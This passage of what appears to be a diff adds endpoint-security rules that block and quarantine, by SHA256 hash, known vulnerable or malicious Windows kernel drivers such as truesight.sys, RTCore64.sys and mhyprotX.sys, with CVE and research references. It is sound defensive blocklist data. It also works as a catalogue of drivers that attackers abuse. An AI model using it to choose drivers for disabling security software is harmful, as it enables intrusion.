+ "creation_date": "2026-03-23T11:45:31.812618Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812624Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "180eddf47ade5cc9a22bb564b989d4671dee90eded8e6317f34cf298ba27d4e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "683cfa93-682f-5cbe-9b0b-12cc2b542bde",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493060Z",
+ "creation_date": "2026-03-23T11:45:31.493064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493071Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1485550a497d9d37a6590b89670694b3d543f4c2dbabd11ae5998c169483a34f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68876d9d-0013-5845-85bc-ea99fb5d5f86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622926Z",
+ "creation_date": "2026-03-23T11:45:29.622928Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622934Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0752dc13548fe8d3b5a7a73c04ebcd7bcfa5e4ecec9ba233d193bd36ed4b54e",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68954278-6904-5a9d-84a5-795295634088",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972807Z",
+ "creation_date": "2026-03-23T11:45:29.972808Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "230fe99d425e870cc03383b195d5a8c0ef3d191baaa4104f6f4cdee4960c48fc",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68ae7d1d-0f4a-571b-9b35-7246af338288",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146186Z",
+ "creation_date": "2026-03-23T11:45:31.146188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "971fb60f6027f273c78d9cce3c64d2d967266f64e55c11f1280f0648c517b9a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68af214a-3326-579d-a5c1-e272459850c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611966Z",
+ "creation_date": "2026-03-23T11:45:29.611968Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611973Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69e3fda487a5ec2ec0f67b7d79a5a836ff0036497b2d1aec514c67d2efa789b2",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68b5ff02-1ad9-5241-8075-da91eb972cef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149698Z",
+ "creation_date": "2026-03-23T11:45:31.149702Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81e7666f31109310bef267df23fad8165004b72ef8ff75a6ae45026bceb33a66",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68ba57f4-7093-549f-a381-76c1c838ecd2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808450Z",
+ "creation_date": "2026-03-23T11:45:31.808452Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808458Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dbe13204cff54a9a8fd19aba5b40e994bfe29f1bfe18547a5975e546ca4b4bb9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68cf5ceb-eb03-55d5-ae1e-cd261e05f4d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830359Z",
+ "creation_date": "2026-03-23T11:45:31.830361Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830367Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "661e45e398bcaa6be493ac9bdc0eae5f604d92c9f72c0a382ce95ea609c66339",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68f5c4da-7818-5ff9-8e5c-7adcc5a9fe50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.142868Z",
+ "creation_date": "2026-03-23T11:45:32.142870Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.142892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae55a0e93e5ef3948adecf20fa55b0f555dcf40589917a5bfbaa732075f0cc12",
+ "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68feafde-76f3-554d-826a-9bf36020231e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607293Z",
+ "creation_date": "2026-03-23T11:45:29.607295Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607301Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f7e47d728ac3301eb47b409801a0f4726a435f78f1ed02c30d2a926259c71f3",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69021801-4155-5739-b3da-a4c524b16832",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150581Z",
+ "creation_date": "2026-03-23T11:45:31.150583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150589Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9f54bd1f5d87827e228c285661303da1ecf8f4b566ef566487b356df5afaf75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6904b38d-5e71-5ea5-9530-ecdff1f51fce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491778Z",
+ "creation_date": "2026-03-23T11:45:31.491780Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491786Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e8a8c2d6cab17e8f29a8ce5eededc2be0bf373c71dc23b3b24a03e172cef151",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "690f0ca7-2a6f-5d89-bcd1-707bfadcfc6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820443Z",
+ "creation_date": "2026-03-23T11:45:30.820445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820450Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71423a66165782efb4db7be6ce48ddb463d9f65fd0f266d333a6558791d158e5",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "690ff1ef-3024-5d4f-9b98-407823a40d58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983938Z",
+ "creation_date": "2026-03-23T11:45:29.983940Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983952Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57d36936fbf8785380536b03e5d9be172e5dd5c3bf435e19875a80aa96f97e1f",
+ "comment": "Vulnerable Kernel Driver (aka iomem64.sys) [https://www.loldrivers.io/drivers/04d377f9-36e0-42a4-8d47-62232163dc68/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "692308e3-90eb-5cea-9242-14fe798ec6a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453254Z",
+ "creation_date": "2026-03-23T11:45:30.453257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453266Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e9c236ed39507661ec32731033c4a9b9c97a6221def69200e03685c08e0bfa7",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "692ef2f3-73fb-5e40-b115-a7e1e8a83eb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485225Z",
+ "creation_date": "2026-03-23T11:45:31.485229Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485239Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25840fd4b3d38ec389e0c24264e2d1bb1a6fa6942d62c8dcb36dc0033044ffc0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "693a9dd6-8888-51b9-b490-40efe9c3a364",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151628Z",
+ "creation_date": "2026-03-23T11:45:31.151652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151661Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c71ce7ec68a7ac488a512a97b0e2e63e6c7fcda46f6192ffdffae4d89fc4d650",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "693d8e1c-85b7-5323-a1f2-8b018ad7d3e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145718Z",
+ "creation_date": "2026-03-23T11:45:32.145720Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cba6df77d819fc098c160402a47ccb616414cbe7e42ea91417cbb5941e04ce41",
+ "comment": "Malicious Kernel Driver (aka driver_1afc1d06.sys) [https://www.loldrivers.io/drivers/d7773616-9860-4768-b6a2-d74f32c23b4e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "694235cd-f3e7-5470-890a-f3b1a16ec980",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154246Z",
+ "creation_date": "2026-03-23T11:45:31.154248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c30da1c7ddbc765f29372789babc58dd9300002d200c8f65111e542e335abb86",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69625a58-e2df-5bef-bdd9-0ca510baecef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608404Z",
+ "creation_date": "2026-03-23T11:45:29.608406Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608412Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e553f5f3b03c3ace8aa47f74df13336873c0ea72c9a192eeb08b59555e007540",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69665441-1b67-55f0-b0c4-cba7aa46e860",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968258Z",
+ "creation_date": "2026-03-23T11:45:29.968260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968265Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "910aa4685c735d8c07662aa04fafec463185699ad1a0cd1967b892fc33ec6c3c",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "696ba961-8e87-5a09-85c5-f3f4b8f9c97f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479634Z",
+ "creation_date": "2026-03-23T11:45:31.479638Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
